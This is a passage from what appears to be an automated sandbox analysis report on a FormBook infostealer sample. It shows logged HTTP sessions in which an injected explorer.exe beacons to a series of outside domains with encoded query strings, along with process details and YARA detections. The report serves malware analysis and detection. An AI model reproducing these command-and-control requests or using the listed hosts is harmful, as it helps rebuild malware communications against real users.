                                                                                                                        Connection: Keep-Alive
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Data Raw: 34 39 30 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 68 59 49 35 46 67 52 69 76 6d 39 37 4c 30 5a 68 78 4a 5a 4a 48 62 36 74 75 39 33 34 30 68 4f 6e 76 6f 43 67 79 56 4e 4c 78 75 67 71 4e 47 46 43 42 37 6d 62 65 42 38 70 62 42 51 77 59 72 58 42 49 6e 5a 32 46 4c 31 52 79 6e 53 33 47 52 33 30 65 6e 49 6b 78 51 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 65 64 67 65 77 6f 6f 64 64 68 72 2e 6e 65 74 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 65 64 67 65 77 6f 6f 64 64 68 72 2e 6e 65 74 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74
                                                                                                                        Data Ascii: 4907<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_hYI5FgRivm97L0ZhxJZJHb6tu9340hOnvoCgyVNLxugqNGFCB7mbeB8pbBQwYrXBInZ2FL1RynS3GR30enIkxQ=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.edgewooddhr.net/px.js?ch=1"></script><script type="text/javascript" src="http://www.edgewooddhr.net/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.st


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        3192.168.2.34973523.224.206.4580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Feb 23, 2021 09:19:35.940804005 CET1963OUTGET /4qdc/?sxlpdB=fgRLe1wDsIR582SpVqHNrqc5X9FQKzC9eNMuu75MPd7YekjVZ2QEORs18XDbgwZ5UcjJ&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.ndk168.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        4192.168.2.34974034.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Feb 23, 2021 09:19:41.279925108 CET2121OUTGET /4qdc/?sxlpdB=DRpehdA/33BzcPgqXFJLC0P+7mKy3AC9kGgryjypn4W4a4lypWUQvIUJQnrelubfkLFp&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.inbarrel.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Feb 23, 2021 09:19:41.421806097 CET2121INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 23 Feb 2021 08:19:41 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "6031584e-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        5192.168.2.34974623.253.73.12280C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Feb 23, 2021 09:19:46.672395945 CET6395OUTGET /4qdc/?sxlpdB=ZB8Pl5eBC7Hephg+P6iGhrGYsApNwIB7ekAHWQJEYqlC8jRN6CLcZFL5CLWpIktyGytq&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.39palmavenue.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Feb 23, 2021 09:19:46.848619938 CET6396INHTTP/1.1 301 Moved Permanently
                                                                                                                        Date: Tue, 23 Feb 2021 08:19:46 GMT
                                                                                                                        Server: Apache/2.4.18 (Ubuntu)
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        X-Request-Id: 192509b7-553e-4f5e-9363-f522e5c5a0f9
                                                                                                                        X-Runtime: 0.011706
                                                                                                                        X-Powered-By: Phusion Passenger Enterprise 6.0.1
                                                                                                                        Location: https://www.onesothebysrealty.com/39palmavenue
                                                                                                                        Status: 301 Moved Permanently
                                                                                                                        Connection: close
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Data Raw: 37 30 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 6e 65 73 6f 74 68 65 62 79 73 72 65 61 6c 74 79 2e 63 6f 6d 2f 33 39 70 61 6c 6d 61 76 65 6e 75 65 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 70<html><body>You are being <a href="https://www.onesothebysrealty.com/39palmavenue">redirected</a>.</body></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        6192.168.2.34974734.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Feb 23, 2021 09:19:52.076121092 CET6397OUTGET /4qdc/?sxlpdB=t6rgzpThEavL/zg9991GCjSWOfv9/TODS4c0mNe7yolhiaEFU/O6K33zqhrleftTdvyE&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.buildassetswealth.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Feb 23, 2021 09:19:52.215910912 CET6397INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 23 Feb 2021 08:19:52 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "603155b9-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        7192.168.2.349748104.21.76.23980C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Feb 23, 2021 09:19:57.363087893 CET6399OUTGET /4qdc/?sxlpdB=uT9syTVFNHzfIlw/vi0ORJwgGNlm67yR3EiChoWxlToAUfSEqT6/a/KF0zmtzwOHQ1u8&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.beconfidentagain.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Feb 23, 2021 09:19:57.433413982 CET6400INHTTP/1.1 301 Moved Permanently
                                                                                                                        Date: Tue, 23 Feb 2021 08:19:57 GMT
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=3600
                                                                                                                        Expires: Tue, 23 Feb 2021 09:19:57 GMT
                                                                                                                        Location: https://www.beconfidentagain.com/4qdc/?sxlpdB=uT9syTVFNHzfIlw/vi0ORJwgGNlm67yR3EiChoWxlToAUfSEqT6/a/KF0zmtzwOHQ1u8&2dz=onbha
                                                                                                                        cf-request-id: 086f924d5800000c651184c000000001
                                                                                                                        Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=uy2dIjQ0nCI30FyxF7TryTCFlKZVe6i0WOQUYmyQB9uCommyFeXKh9PYClp8t%2Bzcx%2BrmopSYRWNR%2BAcNz4w8TD1memlpcGTuMOdnYKOCCrh52FU7NMgfcaY%3D"}],"group":"cf-nel"}
                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 625f865bcee80c65-AMS
                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        8192.168.2.34974992.249.45.19180C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Feb 23, 2021 09:20:07.902918100 CET6401OUTGET /4qdc/?sxlpdB=XrM9oEi9W6a6X8UVQlR+JUyFbINbZfC+p7wdaOxjToB4fXjiFd7gjA62KvYw0vzt+GJp&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.rehabcareconnect.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Feb 23, 2021 09:20:08.052963018 CET6403INHTTP/1.1 404 Not Found
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html
                                                                                                                        Last-Modified: Tue, 09 Jul 2019 06:18:14 GMT
                                                                                                                        Etag: "999-5d2431a6-2d9d76b743ab0996;;;"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 2457
                                                                                                                        Date: Tue, 23 Feb 2021 08:20:07 GMT
                                                                                                                        Server: LiteSpeed
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        9192.168.2.34975234.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Feb 23, 2021 09:20:13.180762053 CET6423OUTGET /4qdc/?sxlpdB=oetlJbthpq9VCk3sxGtc819EDOSw/wKhNDSOaTnbk4bTW9QfHQR4t80kWNVKaJln9Y1c&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.speedysnacksbox.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Feb 23, 2021 09:20:13.319900990 CET6423INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 23 Feb 2021 08:20:13 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "6031584e-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Code Manipulations

                                                                                                                        Statistics

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Start time:09:18:17
                                                                                                                        Start date:23/02/2021
                                                                                                                        Path:C:\Users\user\Desktop\lpdKSOB78u.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\Desktop\lpdKSOB78u.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:217653 bytes
                                                                                                                        MD5 hash:F10054D325DF455C58ECB16EA660D3F2
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:09:18:17
                                                                                                                        Start date:23/02/2021
                                                                                                                        Path:C:\Users\user\Desktop\lpdKSOB78u.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\Desktop\lpdKSOB78u.exe'
                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                        File size:217653 bytes
                                                                                                                        MD5 hash:F10054D325DF455C58ECB16EA660D3F2
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:09:18:22
                                                                                                                        Start date:23/02/2021
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:
                                                                                                                        Imagebase:0x7ff714890000
                                                                                                                        File size:3933184 bytes
                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:09:18:43
                                                                                                                        Start date:23/02/2021
                                                                                                                        Path:C:\Windows\SysWOW64\raserver.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                                                                        Imagebase:0x1330000
                                                                                                                        File size:108544 bytes
                                                                                                                        MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
